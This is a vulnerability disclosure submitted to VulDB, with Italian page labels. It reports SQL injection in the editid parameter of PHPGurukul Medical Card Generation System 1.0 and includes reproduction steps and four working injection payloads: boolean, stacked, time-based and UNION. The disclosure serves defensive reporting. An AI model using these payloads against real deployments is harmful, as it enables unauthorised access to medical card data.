Invia #427403: PHPGurukul Medical Card Generation System - Editid Parameter V1.0 SQL Injectioninformazioni

TitoloPHPGurukul Medical Card Generation System - Editid Parameter V1.0 SQL Injection
DescrizioneI would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing. Details: Affected URL/Endpoint: /mcgs/admin/changeimage.php?editid=1, /mcgs/admin/edit-card-detail.php?editid=1 Vulnerable Parameter: 'editid' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Sign in as admin. 2) Navigate to Managecard > Action 'Edit' > Edit Image 3) Use a proxy like burpsuite to intercept the "card-bwdates-reports-details.php" request. 4) Input the payload to invoke the SQL injection. --- Parameter: editid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: editid=1 AND 3139=3139 Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: editid=1;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: editid=1 AND (SELECT 5373 FROM (SELECT(SLEEP(5)))VtOj) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: editid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162717071,0x644d46485475624f4c745a70576f686b4152677175556968674b494d6145446b624a597163747477,0x7178706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- Please let me know if you need further information or a more detailed analysis.
Utente
 Delvy (UID 74555)
Sottomissione21/10/2024 05:00 (2 anni fa)
Moderazione23/10/2024 13:05 (2 days later)
StatoAccettato
Voce VulDB281565 [PHPGurukul Medical Card Generation System 1.0 Managecard Edit Card Detail Page edit-card-detail.php editid iniezione SQL]
Punti17

PrecedenteVisione D'ensembleIl prossimo

Do you need the next level of professionalism?

Upgrade your account now!